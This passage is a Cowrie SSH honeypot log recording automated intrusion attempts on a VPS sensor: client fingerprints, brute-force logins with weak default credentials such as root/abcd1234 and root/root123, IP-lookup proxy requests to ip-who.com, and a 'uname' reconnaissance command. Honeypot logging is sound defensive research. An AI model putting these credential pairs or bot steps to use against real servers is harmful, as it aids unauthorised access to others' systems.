{"eventid":"cowrie.login.failed","username":"support","password":"admin","message":"login attempt [support/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T00:57:35.390423Z","src_ip":"171.243.150.245","session":"d831988f2971"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":46186,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f1ad2869ab1","protocol":"ssh","message":"New connection: 194.233.79.134:46186 (1.2.3.4:22) [session: 0f1ad2869ab1]","sensor":"my-vps","timestamp":"2025-08-28T00:57:36.794144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:57:36.801069Z","src_ip":"194.233.79.134","session":"0f1ad2869ab1"}
{"eventid":"cowrie.session.closed","duration":"10.4","message":"Connection lost after 10.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:57:37.125236Z","src_ip":"171.243.150.245","session":"d831988f2971"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:57:37.586825Z","src_ip":"194.233.79.134","session":"0f1ad2869ab1"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"jenkins","message":"login attempt [jenkins/jenkins] failed","sensor":"my-vps","timestamp":"2025-08-28T00:57:39.247515Z","src_ip":"194.233.79.134","session":"0f1ad2869ab1"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:57:40.671407Z","src_ip":"194.233.79.134","session":"0f1ad2869ab1"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.151.203","src_port":44618,"dst_ip":"1.2.3.4","dst_port":22,"session":"8027f98d1557","protocol":"ssh","message":"New connection: 171.243.151.203:44618 (1.2.3.4:22) [session: 8027f98d1557]","sensor":"my-vps","timestamp":"2025-08-28T00:58:03.756271Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:58:03.758958Z","src_ip":"171.243.151.203","session":"8027f98d1557"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:58:04.834426Z","src_ip":"171.243.151.203","session":"8027f98d1557"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":59180,"dst_ip":"1.2.3.4","dst_port":22,"session":"30accdeaaa35","protocol":"ssh","message":"New connection: 171.243.150.245:59180 (1.2.3.4:22) [session: 30accdeaaa35]","sensor":"my-vps","timestamp":"2025-08-28T00:58:05.018991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:58:05.054560Z","src_ip":"171.243.150.245","session":"30accdeaaa35"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:58:05.222871Z","src_ip":"171.243.150.245","session":"30accdeaaa35"}
{"eventid":"cowrie.login.success","username":"root","password":"ipscan","message":"login attempt [root/ipscan] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:58:08.311291Z","src_ip":"171.243.151.203","session":"8027f98d1557"}
{"eventid":"cowrie.login.success","username":"root","password":"abcd1234","message":"login attempt [root/abcd1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:58:08.483639Z","src_ip":"171.243.150.245","session":"30accdeaaa35"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"171.243.151.203","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T00:58:08.556612Z","session":"8027f98d1557"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"171.243.150.245","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T00:58:08.694103Z","session":"30accdeaaa35"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T00:58:08.915051Z","src_ip":"171.243.150.245","session":"30accdeaaa35"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:58:09.120325Z","src_ip":"171.243.150.245","session":"30accdeaaa35"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T00:58:09.327411Z","src_ip":"171.243.151.203","session":"8027f98d1557"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47972,"dst_ip":"1.2.3.4","dst_port":22,"session":"d862d3262e8f","protocol":"ssh","message":"New connection: 212.227.125.160:47972 (1.2.3.4:22) [session: d862d3262e8f]","sensor":"my-vps","timestamp":"2025-08-28T00:58:18.216594Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:58:18.226082Z","src_ip":"212.227.125.160","session":"d862d3262e8f"}
{"eventid":"cowrie.session.closed","duration":"21.2","message":"Connection lost after 21.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:58:24.971986Z","src_ip":"171.243.151.203","session":"8027f98d1557"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:58:42.155893Z","src_ip":"212.227.125.160","session":"d862d3262e8f"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":56592,"dst_ip":"1.2.3.4","dst_port":22,"session":"fea3d945e80a","protocol":"ssh","message":"New connection: 194.233.79.134:56592 (1.2.3.4:22) [session: fea3d945e80a]","sensor":"my-vps","timestamp":"2025-08-28T00:59:08.372903Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:59:08.399033Z","src_ip":"194.233.79.134","session":"fea3d945e80a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:59:09.288332Z","src_ip":"194.233.79.134","session":"fea3d945e80a"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:59:12.511058Z","src_ip":"194.233.79.134","session":"fea3d945e80a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41626,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c930c48c36e","protocol":"ssh","message":"New connection: 212.227.125.160:41626 (1.2.3.4:22) [session: 6c930c48c36e]","sensor":"my-vps","timestamp":"2025-08-28T00:59:13.013289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:59:13.020087Z","src_ip":"212.227.125.160","session":"6c930c48c36e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T00:59:13.932478Z","src_ip":"194.233.79.134","session":"fea3d945e80a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T00:59:13.933228Z","src_ip":"194.233.79.134","session":"fea3d945e80a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:59:14.208997Z","src_ip":"212.227.125.160","session":"6c930c48c36e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:59:14.756535Z","src_ip":"194.233.79.134","session":"fea3d945e80a"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:59:14.757653Z","src_ip":"194.233.79.134","session":"fea3d945e80a"}
{"eventid":"cowrie.login.success","username":"root","password":"abcd1234","message":"login attempt [root/abcd1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:59:15.736629Z","src_ip":"212.227.125.160","session":"6c930c48c36e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41634,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdb3a8e0e96b","protocol":"ssh","message":"New connection: 212.227.125.160:41634 (1.2.3.4:22) [session: fdb3a8e0e96b]","sensor":"my-vps","timestamp":"2025-08-28T00:59:16.383641Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:59:16.391887Z","src_ip":"212.227.125.160","session":"fdb3a8e0e96b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T00:59:16.561573Z","session":"6c930c48c36e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-